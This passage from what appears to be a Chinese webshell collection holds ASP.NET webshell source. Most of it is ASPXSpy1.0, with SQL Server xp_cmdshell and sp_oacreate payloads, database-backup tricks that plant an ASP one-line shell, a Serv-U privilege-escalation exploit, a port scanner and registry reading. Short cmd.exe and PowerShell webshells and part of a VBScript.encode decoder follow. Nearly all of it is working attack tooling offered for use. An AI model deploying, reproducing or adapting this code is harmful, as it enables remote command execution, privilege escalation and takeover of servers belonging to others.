Bin_Scroll.Visible = true;
if (Bin_SQLRadioButton.Checked)
{
Bin_DBmenuPanel.Visible = true;
Bin_DBinfoLabel.Visible = false;
}
Bin_DataGrid.Visible = true;
DataTable databind = Bin_DataTable(@"SELECT * FROM " + Session["Bin_Table"]);
Bin_DataGrid.DataSource = databind;
Bin_DataGrid.DataBind();
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
}
public void Bin_ExecSql(string instr)
{
try
{
OpenConnection();
comm.CommandType = CommandType.Text;
comm.CommandText = instr;
comm.ExecuteNonQuery();
}
catch (Exception e)
{
Bin_Error(e.Message);
}
}
public void Item_DataBound(object sender,DataGridItemEventArgs e)
{
for (int i = 2; i < e.Item.Cells.Count; i++)
{
e.Item.Cells[i].Text = e.Item.Cells[i].Text.Replace("<", "<").Replace(">", ">");
}
}
protected void Bin_DBPage(object sender, DataGridPageChangedEventArgs e)
{
Bin_DataGrid.CurrentPageIndex = e.NewPageIndex;
Bin_Databind();
}
public void Item_Command(object sender, DataGridCommandEventArgs e)
{
if (e.CommandName == "Cancel")
{
Bin_DataGrid.EditItemIndex = -1;
Bin_Databind();
}
}
protected void Bin_ExecButton_Click(object sender, EventArgs e)
{
try
{
Bin_Scroll.Visible = true;
Bin_DataGrid.Visible = true;
Bin_DataGrid.AllowPaging = true;
Bin_Accbind();
if (Bin_SQLRadioButton.Checked)
{
Bin_DBmenuPanel.Visible = true;
}
string sqlstr = Bin_DBstrTextBox.Text;
sqlstr = sqlstr.TrimStart().ToLower();
if (sqlstr.Substring(0, 6) == "select")
{
DataTable databind = Bin_DataTable(sqlstr);
Bin_DataGrid.DataSource = databind;
Bin_DataGrid.DataBind();
}
else
{
Bin_ExecSql(sqlstr);
Bin_Databind();
}
}
catch(Exception error)
{
Bin_Error(error.Message);
}
}
protected void Bin_BDButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible = false;
Bin_Accbind();
Bin_DBmenuPanel.Visible = true;
Bin_DataGrid.Visible = false;
Bin_DataGrid.AllowPaging = true;
Bin_Scroll.Visible = false;
Bin_DBstrTextBox.Text = "";
Bin_SAexecButton.Visible = false;
Bin_ResLabel.Visible = false;
Bin_dirPanel.Visible = false;
}
protected void Bin_SACMDButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible = false;
Bin_DataGrid.Visible = false;
Bin_Scroll.Visible = false;
Bin_SAexecButton.Visible = true;
Bin_Change();
Bin_ExecButton.Visible = false;
Bin_ResLabel.Visible = false;
Session["Bin_Option"] = null;
Bin_dirPanel.Visible = false;
}
public void Bin_Change()
{
Bin_ExecButton.Visible = false;
string select = "<input type=hidden name=goaction><input type=hidden name=todo><input type=hidden name=intext><select onchange=if(this.value!='')Command('changedata',this);><option>SQL Server Exec<option value=\"Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll')\">Add sp_oacreate<option value=\"Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll')\">Add xp_cmdshell<option value=\"Exec master.dbo.xp_cmdshell 'net user'\">Add xp_cmdshell<option value=\"EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;\">Add xp_cmdshell(SQL2005)<option value=\"Exec master.dbo.xp_cmdshell 'net user'\">XP_cmdshell exec<option value=\"Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\1.asp';\">SP_oamethod exec<option value=\"sp_makewebtask @outputfile='d:\\web\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))" + "%" + ">''' \">SP_makewebtask make file";
if (Session["Bin_Option"] != null)
{
select += "<option SELECTED>" + Session["Bin_Option"] + "</option>";
}
select += "</select>";
Bin_AccinfoLabel.Text = select;
Bin_DataGrid.Visible = false;
Bin_Scroll.Visible = false;
}
protected void Bin_SAexecButton_Click(object sender, EventArgs e)
{
try
{
Bin_Change();
Bin_DBinfoLabel.Visible = false;
Bin_ExecButton.Visible = false;
Bin_Scroll.Visible = false;
Bin_DataGrid.Visible = false;
Bin_DBmenuPanel.Visible = true;
string sqlstr = Bin_DBstrTextBox.Text;
DataTable databind = Bin_DataTable(sqlstr);
string res = "";
foreach (DataRow dr in databind.Rows)
{
for (int i = 0; i < databind.Columns.Count; i++)
{
res += dr[i] + "\r";
}
}
Bin_ResLabel.Text = "<hr><div id=\"nei\"><PRE>" + res.Replace(" ", " ").Replace("<", "<").Replace(">", ">") + "</PRE></div>";
}
catch (Exception error)
{
Bin_Error(error.Message);
}
}
protected void Bin_DirButton_Click(object sender, EventArgs e)
{
Bin_dirPanel.Visible = true;
Bin_AccPanel.Visible = false;
Bin_DBinfoLabel.Visible = false;
Bin_DataGrid.Visible = false;
Bin_Scroll.Visible = false;
}
protected void Bin_listButton_Click(object sender, EventArgs e)
{
Bin_dirPanel.Visible = true;
Bin_AccPanel.Visible = false;
Bin_DBinfoLabel.Visible = false;
Bin_SqlDir();
}
public void Bin_SqlDir()
{
try
{
Bin_DataGrid.Visible = true;
Bin_Scroll.Visible = true;
Bin_DataGrid.AllowPaging = false;
string exesql = "use pubs;if exists (select * from sysobjects where id = object_id(N'[bin_dir]') and OBJECTPROPERTY(id, N'IsUserTable') = 1) drop table [bin_dir]; CREATE TABLE bin_dir(DirName VARCHAR(400), DirAtt VARCHAR(400),DirFile VARCHAR(400)) INSERT bin_dir EXEC MASTER..XP_dirtree '" + Bin_DirTextBox.Text + "',1,1;";
Bin_ExecSql(exesql);
DataTable sql_dir = Bin_DataTable("select * from bin_dir");
Bin_DataGrid.DataSource = sql_dir;
Bin_DataGrid.DataBind();
}
catch (Exception e)
{
Bin_Error(e.Message);
}
}
protected void Bin_SuButton_Click(object sender, EventArgs e)
{
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = true;
Bin_IISPanel.Visible = false;
Bin_SuresLabel.Text = "";
Bin_LoginPanel.Visible = false;
Bin_RegPanel.Visible = false;
Bin_PortPanel.Visible = false;
}
protected void Bin_dbshellButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible = false;
Bin_AccPanel.Visible = false;
Bin_BakDB();
}
public void Bin_BakDB()
{
string path = Bin_DirTextBox.Text.Trim();
if (path.Substring(path.Length - 1, 1) == @"\")
{
path = path + "bin.asp";
}
else
{
path = path + @"\bin.asp";
}
string sql = "if exists (select * from sysobjects where id = object_id(N'[bin_cmd]') and OBJECTPROPERTY(id, N'IsUserTable') = 1) drop table [bin_cmd];create table [bin_cmd] ([cmd] [image]);declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x62696E backup database @a to disk = @s;insert into [bin_cmd](cmd) values(0x3C256578656375746520726571756573742822422229253E);declare @b sysname,@t nvarchar(4000) select @b=db_name(),@t='" + path + "' backup database @b to disk = @t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];";
Bin_ExecSql(sql);
Bin_SqlDir();
}
public void Bin_BakLog()
{
string path = Bin_DirTextBox.Text.Trim();
if (path.Substring(path.Length - 1, 1) == @"\")
{
path = path + "bin.asp";
}
else
{
path = path + @"\bin.asp";
}
string sql = "if exists (select * from sysobjects where id = object_id(N'[bin_cmd]') and OBJECTPROPERTY(id, N'IsUserTable') = 1) drop table [bin_cmd];create table [bin_cmd] ([cmd] [image]);declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x62696E backup log @a to disk = @s;insert into [bin_cmd](cmd) values(0x3C256578656375746520726571756573742822422229253E);declare @b sysname,@t nvarchar(4000) select @b=db_name(),@t='" + path + "' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];";
Bin_ExecSql(sql);
Bin_SqlDir();
}
protected void Bin_LogshellButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible = false;
Bin_AccPanel.Visible = false;
Bin_BakLog();
}
protected void Bin_SuexpButton_Click(object sender, EventArgs e)
{
string Result = "";
string user = Bin_SunameTextBox.Text;
string pass = Bin_SupassTextBox.Text;
int port = Int32.Parse(Bin_SuportTextBox.Text);
string cmd = Bin_SucmdTextBox.Text;
string loginuser = "user " + user + "\r\n";
string loginpass = "pass " + pass + "\r\n";
string site = "SITE MAINTENANCE\r\n";
string deldomain = "-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n";
string setdomain = "-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";
string newdomain = "-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n";
string quite = "QUIT\r\n";
try
{
TcpClient tcp = new TcpClient("127.0.0.1", port);
tcp.ReceiveBufferSize = 1024;
NetworkStream NS = tcp.GetStream();
Result = Rev(NS);
Result += Send(NS, loginuser);
Result += Rev(NS);
Result += Send(NS, loginpass);
Result += Rev(NS);
Result += Send(NS, site);
Result += Rev(NS);
Result += Send(NS, deldomain);
Result += Rev(NS);
Result += Send(NS, setdomain);
Result += Rev(NS);
Result += Send(NS, newdomain);
Result += Rev(NS);
TcpClient tcp1 = new TcpClient("127.0.0.1", 52521);
NetworkStream NS1 = tcp1.GetStream();
Result += Rev(NS1);
Result += Send(NS1, "user bin\r\n");
Result += Rev(NS1);
Result += Send(NS1, "pass binftp\r\n");
Result += Rev(NS1);
Result += Send(NS1, "site exec " + cmd + "\r\n");
Result += Rev(NS1);
tcp1.Close();
Result += Send(NS, deldomain);
Result += Rev(NS);
Result += Send(NS, quite);
Result += Rev(NS);
tcp.Close();
}
catch (Exception error)
{
Bin_Error(error.Message);
}
Bin_SuresLabel.Text = "<div id=\"su\"><pre>" + Result + "</pre></div>";
}
protected string Rev(NetworkStream instream)
{
string Restr = "";
if (instream.CanRead)
{
byte[] buffer = new byte[1024];
instream.Read(buffer, 0, buffer.Length);
Restr = Encoding.ASCII.GetString(buffer);
}
return "<font color = red>" + Restr + "</font><br>";
}
protected string Send(NetworkStream instream,string Sendstr)
{
if (instream.CanWrite)
{
byte[] buffer = Encoding.ASCII.GetBytes(Sendstr);
instream.Write(buffer, 0, buffer.Length);
}
return "<font color = blue>" + Sendstr + "</font><br>";
}
protected void Bin_IISButton_Click(object sender, EventArgs e)
{
Bin_LoginPanel.Visible = false;
Bin_MainPanel.Visible = false;
Bin_MenuPanel.Visible = true;
Bin_FilePanel.Visible = false;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = true;
Bin_RegPanel.Visible = false;
Bin_PortPanel.Visible = false;
Bin_iisLabel.Text = Bin_iisinfo();
}
protected void Bin_PortButton_Click(object sender, EventArgs e)
{
Bin_MenuPanel.Visible = true;
Bin_LoginPanel.Visible = false;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_RegPanel.Visible = false;
Bin_PortPanel.Visible = true;
Bin_ScanresLabel.Text = "";
}
protected void Bin_RegButton_Click(object sender, EventArgs e)
{
Bin_MenuPanel.Visible = true;
Bin_LoginPanel.Visible = false;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_RegPanel.Visible = true;
Bin_PortPanel.Visible = false;
Bin_RegresLabel.Text = "";
}
protected void Bin_RegreadButton_Click(object sender, EventArgs e)
{
try
{
string regkey = Bin_KeyTextBox.Text;
string subkey = regkey.Substring(regkey.IndexOf("\\") + 1, regkey.Length - regkey.IndexOf("\\") - 1);
RegistryKey rk = null;
if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_LOCAL_MACHINE")
{
rk = Registry.LocalMachine.OpenSubKey(subkey);
}
if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_CLASSES_ROOT")
{
rk = Registry.ClassesRoot.OpenSubKey(subkey);
}
if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_CURRENT_USER")
{
rk = Registry.CurrentUser.OpenSubKey(subkey);
}
if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_USERS")
{
rk = Registry.Users.OpenSubKey(subkey);
}
if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_CURRENT_CONFIG")
{
rk = Registry.CurrentConfig.OpenSubKey(subkey);
}
Bin_RegresLabel.Text = "<br>Result : " + rk.GetValue(Bin_ValueTextBox.Text, "NULL").ToString();
}
catch (Exception error)
{
Bin_Error(error.Message);
}
}
protected void Bin_ScancmdButton_Click(object sender, EventArgs e)
{
try
{
string res = "";
string[] port = Bin_PortsTextBox.Text.Split(',');
for (int i = 0; i < port.Length; i++)
{
res += Bin_Scan(Bin_ScanipTextBox.Text, Int32.Parse(port[i])) + "<br>";
}
Bin_ScanresLabel.Text = "<hr>" + res;
}
catch (Exception error)
{
Bin_Error(error.Message);
}
}
protected string Bin_Scan(string ip, int port)
{
string scanres = "";
TcpClient tcp = new TcpClient();
tcp.SendTimeout = tcp.ReceiveTimeout = 2000;
try
{
tcp.Connect(ip, port);
tcp.Close();
scanres = ip + " : " + port + " ................................. <font color=green><b>Open</b></font>";
}
catch (SocketException e)
{
scanres = ip + " : " + port + " ................................. <font color=red><b>Close</b></font>";
}
return scanres;
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
<title>ASPXSpy1.0 -> Bin:)</title>
<style type="text/css">
A:link {
COLOR:#000000; TEXT-DECORATION:None
}
A:visited {
COLOR:#000000; TEXT-DECORATION:None
}
A:active {
COLOR:#000000; TEXT-DECORATION:None
}
A:hover {
COLOR:#000000; TEXT-DECORATION:underline
}
BODY {
FONT-SIZE: 9pt;
FONT-FAMILY: "Courier New";
}
#nei {
width:500px;
margin:0px auto;
overflow:hidden
}
#su {
width:300px;
margin:0px auto;
overflow:hidden
}
#cmd {
width:500px;
margin:0px auto;
overflow:hidden
}
</style>
<script type="text/javascript" language="javascript" >
function Command(cmd, str)
{
var strTmp = str;
var frm = document.forms[0];
if(cmd == 'del')
{
if(confirm('Del It ?'))
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
else return;
}
if (cmd == 'change')
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
if (cmd == 'down')
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
if (cmd == 'showatt')
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
if (cmd == 'edit')
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
if (cmd == 'deldir')
{
if(confirm('Del It ?'))
{
frm.todo.value = str;
frm.goaction.value = cmd;
frm.submit();
}
else return;
}
if(cmd == 'rename' )
{
frm.goaction.value = cmd;
frm.todo.value = str + ',';
str = prompt('Please input new filename:', strTmp);
if(str && (strTmp != str))
{
frm.todo.value += str;
frm.submit();
}
else return;
}
if(cmd == 'renamedir' )
{
frm.goaction.value = cmd;
frm.todo.value = str + ',';
str = prompt('Please input new foldername:', strTmp);
if(str && (strTmp != str))
{
frm.todo.value += str;
frm.submit();
}
else return;
}
if (cmd == 'postdata')
{
frm.todo.value = str.value;
frm.goaction.value = cmd;
frm.submit();
}
if (cmd == 'changedata')
{
frm.todo.value = str.value;
frm.intext.value = str.options[str.selectedIndex].innerText
frm.goaction.value = cmd;
frm.submit();
}
}
</script>
</head>
<body>
<form id="form1" runat="server"><div style="text-align: center"><asp:Panel ID="Bin_LoginPanel" runat="server" Height="47px" Width="401px">
<asp:Label ID="PassLabel" runat="server" Text="Password:"></asp:Label>
<asp:TextBox ID="passtext" runat="server" TextMode="Password" Width="203px"></asp:TextBox>
<asp:Button ID="LoginButton" runat="server" Text="Enter" OnClick="LoginButton_Click" /><p />
Copyright (C) 2008 Bin -> <a href="http://www.rootkit.net.cn" target="_blank">WwW.RoOTkIt.NeT.Cn</a></asp:Panel><asp:Panel ID="Bin_MenuPanel" runat="server" Height="56px" Width="771px">
<asp:Label ID="TimeLabel" runat="server" Text="Label" Width="150px"></asp:Label><br />
<asp:Button ID="MainButton" runat="server" OnClick="MainButton_Click" Text="Sysinfo" />
<asp:Button ID="Bin_IISButton" runat="server" OnClick="Bin_IISButton_Click" Text="IISSpy" />
<asp:Button ID="FileButton" runat="server" OnClick="FileButton_Click" Text="WebShell" />
<asp:Button ID="Bin_CmdButton" runat="server" Text="Command" OnClick="Bin_CmdButton_Click" />
<asp:Button ID="Bin_SQLButton" runat="server" OnClick="Bin_SQLButton_Click" Text="SqlTools" /> <asp:Button
ID="Bin_SuButton" runat="server" OnClick="Bin_SuButton_Click" Text="SuExp" />
<asp:Button ID="Bin_PortButton" runat="server" Text="PortScan" OnClick="Bin_PortButton_Click" />
<asp:Button ID="Bin_RegButton" runat="server" Text="RegShell" OnClick="Bin_RegButton_Click" />
<asp:Button ID="LogoutButton" runat="server" OnClick="LogoutButton_Click" Text="Logout" /><br />
<asp:Label ID="Bin_ErrorLabel" runat="server" EnableViewState="False">Copyright (C) 2008 Bin -> <a href="http://www.rootkit.net.cn" target="_blank">WwW.RoOTkIt.NeT.Cn</a> -> <a href="http://www.rootkit.net.cn/index.aspx" target="_blank">Reverse-IP</a> </asp:Label></asp:Panel>
<asp:Panel ID="Bin_MainPanel" runat="server" Width="769px" EnableViewState="False" Visible="False" Height="20px">
<div style="text-align: left"><asp:Label ID="InfoLabel" runat="server" Width="765px" EnableViewState="False" ></asp:Label></div></asp:Panel><div style="text-align: center">
<asp:Panel ID="Bin_FilePanel" runat="server" Width="767px" EnableViewState="False" Visible="False"><div style="text-align: left"><asp:Label ID="Bin_FileLabel" runat="server" Text="Label" Width="764px"></asp:Label><br />
<asp:Label ID="Bin_UpfileLabel" runat="server" Text="Upfile : "></asp:Label>
<input class="TextBox" id="Bin_UpFile" type="file" name="upfile" runat="server" /> <asp:TextBox ID="Bin_upTextBox" runat="server" Width="339px"></asp:TextBox>
<asp:Button ID="Bin_GoButton" runat="server" OnClick="Bin_GoButton_Click" Text="GO" />
<asp:Button ID="Bin_upButton" runat="server" Text="UpLoad" OnClick="Bin_upButton_Click" EnableViewState="False" /><br />
<asp:Label ID="Bin_CreateLabel" runat="server" Text="Create :"></asp:Label>
<asp:TextBox ID="Bin_CreateTextBox" runat="server"></asp:TextBox><asp:Button ID="Bin_NewFileButton"
runat="server" Text="NewFile" OnClick="Bin_NewFileButton_Click" />
<asp:Button ID="Bin_NewdirButton" runat="server" Text="NewDir" OnClick="Bin_NewdirButton_Click" />
<br />
<asp:Label ID="Bin_CopyLabel" runat="server" Text="Copy :" Width="39px"></asp:Label>
<asp:TextBox ID="Bin_CopyTextBox" runat="server" Width="273px"></asp:TextBox>
<asp:Label ID="Bin_CopytoLable" runat="server" Text="To:"></asp:Label>
<asp:TextBox ID="Bin_CopytoTextBox" runat="server" Width="268px"></asp:TextBox>
<asp:Button ID="Bin_CopyButton" runat="server" Text="Copy" OnClick="Bin_CopyButton_Click" />
<asp:Button ID="Bin_CutButton" runat="server" Text="Cut" Width="46px" OnClick="Bin_CutButton_Click" />
<asp:Label ID="Bin_FilelistLabel" runat="server" EnableViewState="False"></asp:Label></div><div style="text-align: center">
<asp:Panel ID="Bin_AttPanel" runat="server" Width="765px" Visible="False"><hr />
FileName :
<asp:Label ID="Bin_AttLabel" runat="server" Text="Label"></asp:Label><br />
<asp:CheckBox ID="Bin_ReadOnlyCheckBox" runat="server" Text="ReadOnly" />
<asp:CheckBox ID="Bin_SystemCheckBox" runat="server" Text="System" />
<asp:CheckBox ID="Bin_HiddenCheckBox" runat="server" Text="Hidden" />
<asp:CheckBox ID="Bin_ArchiveCheckBox" runat="server" Text="Archive" />
<br />
CreationTime :
<asp:TextBox ID="Bin_CreationTimeTextBox" runat="server" Width="123px"></asp:TextBox>
LastWriteTime :
<asp:TextBox ID="Bin_LastWriteTimeTextBox" runat="server" Width="129px"></asp:TextBox>
LastAccessTime :
<asp:TextBox ID="Bin_AccessTimeTextBox" runat="server" Width="119px"></asp:TextBox><br />
<asp:Button ID="Bin_SetButton" runat="server" OnClick="Bin_SetButton_Click" Text="Set" />
<asp:Button ID="Bin_SbackButton" runat="server" OnClick="Bin_SbackButton_Click" Text="Back" />
<hr />
</asp:Panel></div>
<div style="text-align: center"><asp:Panel ID="Bin_EditPanel" runat="server" Visible="False"><hr style="width: 757px" />
Path:<asp:TextBox ID="Bin_EditpathTextBox" runat="server" Width="455px"></asp:TextBox><br />
<asp:TextBox ID="Bin_EditTextBox" runat="server" TextMode="MultiLine" Columns="100" Rows="25" Width="760px"></asp:TextBox><br />
<asp:Button ID="Bin_EditButton" runat="server" Text="Sumbit" OnClick="Bin_EditButton_Click" /> <asp:Button
ID="Bin_BackButton" runat="server" OnClick="Bin_BackButton_Click" Text="Back" /></asp:Panel></div></asp:Panel></div>
<asp:Panel ID="Bin_CmdPanel" runat="server" Height="50px" Width="763px"><hr />
CmdPath : <asp:TextBox ID="Bin_CmdPathTextBox" runat="server" Width="395px">C:\Windows\System32\Cmd.exe</asp:TextBox><br />
Argument :
<asp:TextBox ID="Bin_CmdShellTextBox" runat="server" Width="395px">/c Set</asp:TextBox><br />
<asp:Button ID="Bin_RunButton" runat="server" OnClick="Bin_RunButton_Click" Text="Run" />
<div style="text-align: left">
<asp:Label ID="Bin_CmdLabel" runat="server" EnableViewState="False"></asp:Label></div>
<hr /></asp:Panel>
<asp:Panel ID="Bin_SQLPanel" runat="server" Visible="False" Width="763px">
<hr />
ConnString :
<asp:TextBox ID="Bin_SQLconnTextBox" runat="server" Width="547px">server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB</asp:TextBox><br />
<asp:RadioButton ID="Bin_SQLRadioButton" runat="server" AutoPostBack="True" OnCheckedChanged="Bin_SQLRadioButton_CheckedChanged" Text="MS-SQL" Checked="True" />
<asp:RadioButton ID="Bin_AccRadioButton" runat="server" AutoPostBack="True" OnCheckedChanged="Bin_AccRadioButton_CheckedChanged" Text="MS-Access" />
<asp:Button ID="SQL_SumbitButton" runat="server" Text="Sumbit" OnClick="SQL_SumbitButton_Click" /><hr />
<asp:Panel ID="Bin_DBmenuPanel" runat="server" Width="759px" Visible="False">
<asp:Button ID="Bin_BDButton" runat="server" Text="DataBase" OnClick="Bin_BDButton_Click" />
<asp:Button ID="Bin_SACMDButton" runat="server" Text="SA_Exec" OnClick="Bin_SACMDButton_Click" />
<asp:Button ID="Bin_DirButton" runat="server" Text="SQL_Dir" OnClick="Bin_DirButton_Click" /><br /><hr /><div style="text-align: left">
<asp:Label ID="Bin_DBinfoLabel" runat="server" Text="Label" EnableViewState="False"></asp:Label></div></asp:Panel>
<asp:Panel ID="Bin_AccPanel" runat="server" Height="50px" Width="759px" EnableViewState="False">
<asp:Label ID="Bin_AccinfoLabel" runat="server" Text="Label" EnableViewState="False"></asp:Label><br />
<asp:TextBox ID="Bin_DBstrTextBox" runat="server" TextMode="MultiLine" Width="569px"></asp:TextBox>
<asp:Button ID="Bin_ExecButton" runat="server" OnClick="Bin_ExecButton_Click" Text="Exec" />
<asp:Button ID="Bin_SAexecButton" runat="server" Text="SA_Exec" OnClick="Bin_SAexecButton_Click" /><br />
<div style="text-align:left">
<asp:Label ID="Bin_ResLabel" runat="server" ></asp:Label></div></asp:Panel>
<asp:Panel ID="Bin_dirPanel" runat="server" Visible="False" Width="759px">
Path :
<asp:TextBox ID="Bin_DirTextBox" runat="server" Width="447px">c:\</asp:TextBox>
<br />
<asp:Button ID="Bin_listButton" runat="server" OnClick="Bin_listButton_Click" Text="Dir" /> <asp:Button
ID="Bin_dbshellButton" runat="server" OnClick="Bin_dbshellButton_Click" Text="Bak_DB" />
<asp:Button ID="Bin_LogshellButton" runat="server" Text="Bak_LOG" OnClick="Bin_LogshellButton_Click" /><hr /></asp:Panel>
<br /><br />
<div style="overflow:scroll; text-align:left; width:770px;" id="Bin_Scroll" runat="server" visible="false" >
<asp:DataGrid ID="Bin_DataGrid" runat="server" Width="753px" PageSize="20" CssClass="Bin_DataGrid" OnItemDataBound="Item_DataBound" AllowPaging="True" OnPageIndexChanged="Bin_DBPage" OnItemCommand="Item_Command">
<PagerStyle Mode="NumericPages" Position="TopAndBottom" />
</asp:DataGrid></div>
</asp:Panel>
<asp:Panel ID="Bin_SuPanel" runat="server" Width="763px" >
<hr />
Name :
<asp:TextBox ID="Bin_SunameTextBox" runat="server">localadministrator</asp:TextBox>
Pass :
<asp:TextBox ID="Bin_SupassTextBox" runat="server">#l@$ak#.lk;0@P</asp:TextBox>
Port :
<asp:TextBox ID="Bin_SuportTextBox" runat="server">43958</asp:TextBox><br />
CMD :
<asp:TextBox ID="Bin_SucmdTextBox" runat="server" Width="447px">cmd.exe /c net user</asp:TextBox><br />
<asp:Button ID="Bin_SuexpButton" runat="server" Text="Exploit" OnClick="Bin_SuexpButton_Click" /><br />
<div style="text-align:left">
<hr />
<asp:Label ID="Bin_SuresLabel" runat="server"></asp:Label>
</div>
</asp:Panel>
<asp:Panel ID="Bin_IISPanel" runat="server" Width="763px"><div style="text-align:left">
<hr />
<asp:Label ID="Bin_iisLabel" runat="server" Text="Label" EnableViewState="False"></asp:Label> </div></asp:Panel>
<asp:Panel ID="Bin_RegPanel" runat="server" Width="763px"><hr /><div style="text-align:left">
KEY : <asp:TextBox ID="Bin_KeyTextBox" runat="server" Width="595px">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName</asp:TextBox><br />
VALUE :
<asp:TextBox ID="Bin_ValueTextBox" runat="server" Width="312px">ComputerName</asp:TextBox> <asp:Button
ID="Bin_RegreadButton" runat="server" Text="Read" OnClick="Bin_RegreadButton_Click" /><br />
<asp:Label ID="Bin_RegresLabel" runat="server"></asp:Label><hr /></div></asp:Panel>
<asp:Panel ID="Bin_PortPanel" runat="server" Width="763px">
<hr /><div style="text-align:left">
IP :
<asp:TextBox ID="Bin_ScanipTextBox" runat="server" Width="194px">127.0.0.1</asp:TextBox>
PORT :
<asp:TextBox ID="Bin_PortsTextBox" runat="server" Width="356px">21,80,1433,3306,3389,4899,5631,43958,65500</asp:TextBox>
<asp:Button ID="Bin_ScancmdButton" runat="server" Text="Scan" OnClick="Bin_ScancmdButton_Click" /><br />
<asp:Label ID="Bin_ScanresLabel" runat="server"></asp:Label></div><hr /></asp:Panel>
</div></form>
</body>
</html>
CMS webshell
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Reflection" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Web" %>
<%@ Import Namespace="System.Web.UI" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>
<script runat="server">
protected void exec(object sender, EventArgs e)
{
string item = cmd.Text;
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.CreateNoWindow = true;
string strOutput = null;
p.Start();
p.StandardInput.WriteLine(item);
p.StandardInput.WriteLine("exit");
strOutput = p.StandardOutput.ReadToEnd();
p.WaitForExit();
p.Close();
Response.Write("<pre>");
Response.Write(strOutput);
Response.Write("</pre>");
}
protected void Page_Load(object sender, EventArgs e)
{
}
</script>
<form id="form1" runat="server">
<asp:TextBox id="cmd" runat="server" Text="dir c:" /><asp:Button id="btn" onclick="exec" runat="server" Text="execute" />
</form>
Powershell webshell
string do_ps(string arg)
{
//This section based on cmdasp webshell by http://michaeldaw.org
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "powershell.exe";
psi.Arguments = "-noninteractive " + "-executionpolicy bypass " + arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
webshell中常见的编码转换隐藏方式
VBScript.encode
Public Function DCScript(ByVal Script As String) As String
Dim s As String, l As Long
Dim b As Long, e As Long
Dim k As Long
l = LenB(Script): s = Space(l) '...
b = InStr(Script, "#@~^") '#@~^******==
e = InStr(Script, "^#~@") '******==^#~@
If b = 0 Or e = 0 Then
If MsgBox("没找到密文开始/结束标识,解密结果可能有误!要继续吗?", vbYesNo) = vbNo Then
Exit Function
Else
If e = 0 Then e = l Else e = e - 8
If b = 0 Then b = 1 Else b = b + 12
End If
Else
b = b + 12 '为0则全部解密
e = e - 8 '为0则算到末尾
End If
frmMain.Caption = "Decoding ..."
Script = Mid(Script, b, e - b + 1)
'Script = Replace(Script, "@#", Chr(13))
'Script = Replace(Script, "@&", Chr(10))
Script = Replace(Script, "@#@&", Chr(13) + Chr(10)) 'vbcCrlf
Script = Replace(Script, "@!", "<")
Script = Replace(Script, "@*", ">")
